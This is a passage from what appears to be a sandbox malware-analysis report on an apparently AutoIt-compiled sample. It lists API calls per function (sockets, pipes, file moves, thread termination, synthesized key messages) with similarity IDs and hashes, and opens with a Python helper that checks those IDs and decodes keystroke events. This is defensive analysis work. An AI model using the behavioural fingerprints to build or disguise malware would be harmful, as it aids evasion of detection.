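WM = {0x100: "WM_KEYDOWN", 0x101: "WM_KEYUP"}            # standard Win32 values
VK = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN"}


def parse_calls(block):
    """One dict per API line, subcall lines included: api, mod, args, ref, sub."""
    calls = []
    for line in block.splitlines():
        m = CALL_RE.search(line)
        if m:
            d = m.groupdict()
            d["args"] = d["args"].split(",") if d["args"] else []
            calls.append(d)
    return calls

def tokens(api):
    """Words an API name contributes to the similarity string."""
    if api[0].islower() or api[0] == "_":   # CRT/Winsock names stay whole
        if len(api) > 1 and api[-1] in "WA" and api[-2].islower():
            return [api[:-1]]                # lstrcmpiW -> lstrcmpi
        return [api]
    return [t for t in CAMEL_RE.findall(api) if t.lower() not in STOP]

def api_id(calls):
    """Words grouped by descending call count, ASCII-sorted within a group,
    groups joined with '$' (the layout of every API ID on this page)."""
    counts = Counter(t for c in calls for t in tokens(c["api"]))
    groups = {}
    for word, n in counts.items():
        groups.setdefault(n, []).append(word)
    return "$".join("".join(sorted(groups[n])) for n in sorted(groups, reverse=True))

def check_api_id(block):
    """Return (recomputed API ID, API ID printed in the block)."""
    m = API_ID_RE.search(block)
    return api_id(parse_calls(block)), (m.group("id") if m else None)

def synthesized_keys(calls):
    """Decode PostMessageW/SendMessageW(hwnd, msg, wParam, lParam) key events.
    '?' arguments are values the sandbox could not resolve and are skipped."""
    keys = []
    for c in calls:
        if c["api"] in ("PostMessageW", "SendMessageW") and len(c["args"]) >= 3:
            try:
                msg, vk = int(c["args"][1], 16), int(c["args"][2], 16)
            except ValueError:
                continue
            if msg in WM:
                keys.append((c["ref"], WM[msg], VK.get(vk, hex(vk))))
    return keys

if __name__ == "__main__":
    for block in (KEYUP_BLOCK, SOCKET_BLOCK):
        computed, reported = check_api_id(block)
        print(computed, "== report" if computed == reported else f"!= report {reported}")
        for ref, msg, vk in synthesized_keys(parse_calls(block)):
            print(f"  {ref}: {msg} {vk}")
```

Feed any other block from this report to `check_api_id`; a mismatch means the inferred stop list does not cover a word in that block's API names and needs extending, which is the caveat to relying on it beyond the functions shown here. The keystroke decode shows that the two keyboard-state functions post modifier key up and key down events (Shift, Control, Alt, LWin) to a parent window after saving and restoring the keyboard state, the kind of routine a compiled AutoIt runtime carries for ControlSend; the API ID is useful for matching this function across samples, not as a verdict on its own.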
                                                  APIs
                                                  • GetConsoleCP.KERNEL32(005D3CD6,?,?,?,?,?,?,?,?,005C5BA3,?,?,005D3CD6,?,?), ref: 005C5470
                                                  • __fassign.LIBCMT ref: 005C54EB
                                                  • __fassign.LIBCMT ref: 005C5506
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,005D3CD6,00000005,00000000,00000000), ref: 005C552C
                                                  • WriteFile.KERNEL32(?,005D3CD6,00000000,005C5BA3,00000000,?,?,?,?,?,?,?,?,?,005C5BA3,?), ref: 005C554B
                                                  • WriteFile.KERNEL32(?,?,00000001,005C5BA3,00000000,?,?,?,?,?,?,?,?,?,005C5BA3,?), ref: 005C5584
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                   • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                  • String ID:
                                                  • API String ID: 1324828854-0
                                                  • Opcode ID: 5aa7097cd44f19a4a86a9c8c729202ccca0619a13ade4e35995589ebdd2272ce
                                                  • Instruction ID: cdb58cecef225c2c75c977c50c52affaa9dfdec230b6a12df419d3b3b3312cb6
                                                  • Opcode Fuzzy Hash: 5aa7097cd44f19a4a86a9c8c729202ccca0619a13ade4e35995589ebdd2272ce
                                                  • Instruction Fuzzy Hash: 2A518171A00649AFDB10CFE8D845FEEBBF9FB09310F14451EE955E7291E670AA81CB60
                                                  APIs
                                                    • Part of subcall function 0061304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0061307A
                                                    • Part of subcall function 0061304E: _wcslen.LIBCMT ref: 0061309B
                                                  • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00611112
                                                  • WSAGetLastError.WSOCK32 ref: 00611121
                                                  • WSAGetLastError.WSOCK32 ref: 006111C9
                                                  • closesocket.WSOCK32(00000000), ref: 006111F9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                   • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                  • String ID:
                                                  • API String ID: 2675159561-0
                                                  • Opcode ID: 40ceadee83ae6e484894447ef2b261477f33bc6b9caaa84da24d3650696e2b86
                                                  • Instruction ID: 27060d18d3baa446c132a627b987138fe24ddd2bf7b39c528f4da9d4867b1ef0
                                                  • Opcode Fuzzy Hash: 40ceadee83ae6e484894447ef2b261477f33bc6b9caaa84da24d3650696e2b86
                                                  • Instruction Fuzzy Hash: FC41C431600614AFDB109F14C845BE9BBEBFF46324F188059FA159F391D774AD82CBA1
                                                  APIs
                                                    • Part of subcall function 005FDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,005FCF22,?), ref: 005FDDFD
                                                    • Part of subcall function 005FDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,005FCF22,?), ref: 005FDE16
                                                  • lstrcmpiW.KERNEL32(?,?), ref: 005FCF45
                                                  • MoveFileW.KERNEL32(?,?), ref: 005FCF7F
                                                  • _wcslen.LIBCMT ref: 005FD005
                                                  • _wcslen.LIBCMT ref: 005FD01B
                                                  • SHFileOperationW.SHELL32(?), ref: 005FD061
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                   • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                  • String ID: \*.*
                                                  • API String ID: 3164238972-1173974218
                                                  • Opcode ID: 8c18a969e465e3daaaf3d728698fa66de2c45f3e84063c22e6798d6e1310b28f
                                                  • Instruction ID: 721b9bf96aa80ad3e2004534d19dfe21db0ad3dad4d4911dca775c66504efdc8
                                                  • Opcode Fuzzy Hash: 8c18a969e465e3daaaf3d728698fa66de2c45f3e84063c22e6798d6e1310b28f
                                                  • Instruction Fuzzy Hash: 2D41467194521D5FDF12EBA4CA85EEEBFB9BF48340F1000E6E605EB151EA38A749CB50
                                                  APIs
                                                  • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00622E1C
                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00622E4F
                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00622E84
                                                  • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00622EB6
                                                  • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00622EE0
                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00622EF1
                                                  • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00622F0B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                   • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: LongWindow$MessageSend
                                                  • String ID:
                                                  • API String ID: 2178440468-0
                                                  • Opcode ID: e8373657cf3c107ce3e2913424263b64902c2e9e5747e232cf348a1bbd7294e5
                                                  • Instruction ID: 0e52510768787a27d6b186d80820827371f164e6e6241ebe17d5eb311a099aa8
                                                  • Opcode Fuzzy Hash: e8373657cf3c107ce3e2913424263b64902c2e9e5747e232cf348a1bbd7294e5
                                                  • Instruction Fuzzy Hash: C5311930644562AFDB20CF18EC94FA537E2FB5A720F1A5164F5408F2B1CBB1A841EF01
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005F7769
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005F778F
                                                  • SysAllocString.OLEAUT32(00000000), ref: 005F7792
                                                  • SysAllocString.OLEAUT32(?), ref: 005F77B0
                                                  • SysFreeString.OLEAUT32(?), ref: 005F77B9
                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 005F77DE
                                                  • SysAllocString.OLEAUT32(?), ref: 005F77EC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                   • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                  • String ID:
                                                  • API String ID: 3761583154-0
                                                  • Opcode ID: 45e665ea8ce9cf1ba0748a191abff5a08b2c39b9a30fd12491bec4fce531eefa
                                                  • Instruction ID: 46be998e37008ce2a3cac03b7f9e61c8b6fa99a895b51a968ba310e355d996ef
                                                  • Opcode Fuzzy Hash: 45e665ea8ce9cf1ba0748a191abff5a08b2c39b9a30fd12491bec4fce531eefa
                                                  • Instruction Fuzzy Hash: E8219F7661561DAFDB10AFA8CC88CBF7BEDFB093647108425FA14DB150D6749C428BA0
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005F7842
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005F7868
                                                  • SysAllocString.OLEAUT32(00000000), ref: 005F786B
                                                  • SysAllocString.OLEAUT32 ref: 005F788C
                                                  • SysFreeString.OLEAUT32 ref: 005F7895
                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 005F78AF
                                                  • SysAllocString.OLEAUT32(?), ref: 005F78BD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                   • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                  • String ID:
                                                  • API String ID: 3761583154-0
                                                  • Opcode ID: 9394810d19769ae18bafbab574bf31ed7a5f4554a874247cc3eb33869783aa03
                                                  • Instruction ID: 4c53502cee08008c50f245921898602666e99e6f76ba93f11580eefabb6d7c2d
                                                  • Opcode Fuzzy Hash: 9394810d19769ae18bafbab574bf31ed7a5f4554a874247cc3eb33869783aa03
                                                  • Instruction Fuzzy Hash: 6A214F31604509AFDB20ABA8DC89DBA7BEDFB097A07108525BA15CB2A1D664DC41CB64
                                                  APIs
                                                  • GetStdHandle.KERNEL32(0000000C), ref: 006004F2
                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0060052E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CreateHandlePipe
                                                  • String ID: nul
                                                  • API String ID: 1424370930-2873401336
                                                  • Opcode ID: 13ec54d6545b3bd062c66e38eb38474f8282ffb3f9cdaa8706ec1d93aee2c5b4
                                                  • Instruction ID: a8114c37e08009d69f1d8e4f88a2cae97068065a2f96067d3d1cc9e18608990d
                                                  • Opcode Fuzzy Hash: 13ec54d6545b3bd062c66e38eb38474f8282ffb3f9cdaa8706ec1d93aee2c5b4
                                                  • Instruction Fuzzy Hash: 18218BB5540706EBEB258F29DD04B9B7BB6EF44724F204A29F8A1D72E0D7709941CF20
                                                  APIs
                                                  • GetStdHandle.KERNEL32(000000F6), ref: 006005C6
                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00600601
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CreateHandlePipe
                                                  • String ID: nul
                                                  • API String ID: 1424370930-2873401336
                                                  • Opcode ID: 57185594218a62b70e93e9590f5d8d4be2602b7a182288b76d0eda4693eeb99e
                                                  • Instruction ID: 53b0fd826b3165195b65efbb02c7ea3fd85459bf4d858c96d875e862aab3a1f9
                                                  • Opcode Fuzzy Hash: 57185594218a62b70e93e9590f5d8d4be2602b7a182288b76d0eda4693eeb99e
                                                  • Instruction Fuzzy Hash: 29219F355407069BEB288F68DC04B9B77A6AF85730F200A19F8A1E33E0DB719961CB10
                                                  APIs
                                                    • Part of subcall function 0059600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0059604C
                                                    • Part of subcall function 0059600E: GetStockObject.GDI32(00000011), ref: 00596060
                                                    • Part of subcall function 0059600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0059606A
                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00624112
                                                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0062411F
                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0062412A
                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00624139
                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00624145
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CreateObjectStockWindow
                                                  • String ID: Msctls_Progress32
                                                  • API String ID: 1025951953-3636473452
                                                  • Opcode ID: 793f07dcebd4fd1c7c70a0e0dd92eb28ea8c9bde52732fcc94aa56aad85a5a22
                                                  • Instruction ID: 82018372e2c8078b90cf3b2bb10c6135a029b2ad2a0a1d4909b29a0b1cd275c9
                                                  • Opcode Fuzzy Hash: 793f07dcebd4fd1c7c70a0e0dd92eb28ea8c9bde52732fcc94aa56aad85a5a22
                                                  • Instruction Fuzzy Hash: 6411B6B114022A7EEF118F64DC85EE77F5EEF09798F014110FA18A6190CB729C61DBA4
                                                  APIs
                                                    • Part of subcall function 005CD7A3: _free.LIBCMT ref: 005CD7CC
                                                  • _free.LIBCMT ref: 005CD82D
                                                    • Part of subcall function 005C29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,005CD7D1,00000000,00000000,00000000,00000000,?,005CD7F8,00000000,00000007,00000000,?,005CDBF5,00000000), ref: 005C29DE
                                                    • Part of subcall function 005C29C8: GetLastError.KERNEL32(00000000,?,005CD7D1,00000000,00000000,00000000,00000000,?,005CD7F8,00000000,00000007,00000000,?,005CDBF5,00000000,00000000), ref: 005C29F0
                                                  • _free.LIBCMT ref: 005CD838
                                                  • _free.LIBCMT ref: 005CD843
                                                  • _free.LIBCMT ref: 005CD897
                                                  • _free.LIBCMT ref: 005CD8A2
                                                  • _free.LIBCMT ref: 005CD8AD
                                                  • _free.LIBCMT ref: 005CD8B8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                  • Instruction ID: 4559227e852571de5d378b20d686de9cd7515b32df9452a89f1d60aff7aadb10
                                                  • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                  • Instruction Fuzzy Hash: 9C11E771540B05AED621BFF0CC4AFCB7FE8FF84700F405829B29DE6892DA79A5458660
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 005FDA74
                                                  • LoadStringW.USER32(00000000), ref: 005FDA7B
                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 005FDA91
                                                  • LoadStringW.USER32(00000000), ref: 005FDA98
                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 005FDADC
                                                  Strings
                                                  • %s (%d) : ==> %s: %s %s, xrefs: 005FDAB9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: HandleLoadModuleString$Message
                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                  • API String ID: 4072794657-3128320259
                                                  • Opcode ID: 6db913738a3e127145164f2efce319709a7b271019d7dffef74615209d985286
                                                  • Instruction ID: d7b9e9d09100ba744b5955d369183b783e603855b39fd00e6cb0aa015a084600
                                                  • Opcode Fuzzy Hash: 6db913738a3e127145164f2efce319709a7b271019d7dffef74615209d985286
                                                  • Instruction Fuzzy Hash: 440186F250020C7FE710ABA4DD89EFB376DEB08311F405492B746E2141E6749E858F74
                                                  APIs
                                                  • InterlockedExchange.KERNEL32(0162D130,0162D130), ref: 0060097B
                                                  • EnterCriticalSection.KERNEL32(0162D110,00000000), ref: 0060098D
                                                  • TerminateThread.KERNEL32(0162D128,000001F6), ref: 0060099B
                                                  • WaitForSingleObject.KERNEL32(0162D128,000003E8), ref: 006009A9
                                                  • CloseHandle.KERNEL32(0162D128), ref: 006009B8
                                                  • InterlockedExchange.KERNEL32(0162D130,000001F6), ref: 006009C8
                                                  • LeaveCriticalSection.KERNEL32(0162D110), ref: 006009CF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                  • String ID:
                                                  • API String ID: 3495660284-0
                                                  • Opcode ID: e1184cf600fde6127ca3f2885d1500d8652b91b9ef8261ecdbd8c4cefb8219a6
                                                  • Instruction ID: a5b979d6b9742f947cb6afa2ac65c7a480640dfcb25864083532b17c2e45f0f0
                                                  • Opcode Fuzzy Hash: e1184cf600fde6127ca3f2885d1500d8652b91b9ef8261ecdbd8c4cefb8219a6
                                                  • Instruction Fuzzy Hash: 1BF01D31442D02EBE7655B94EE8DBDA7A26BF01712F503015F101548A0CB749566DF90
                                                  APIs
                                                  • __allrem.LIBCMT ref: 005C00BA
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005C00D6
                                                  • __allrem.LIBCMT ref: 005C00ED
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005C010B
                                                  • __allrem.LIBCMT ref: 005C0122
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005C0140
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                  • String ID:
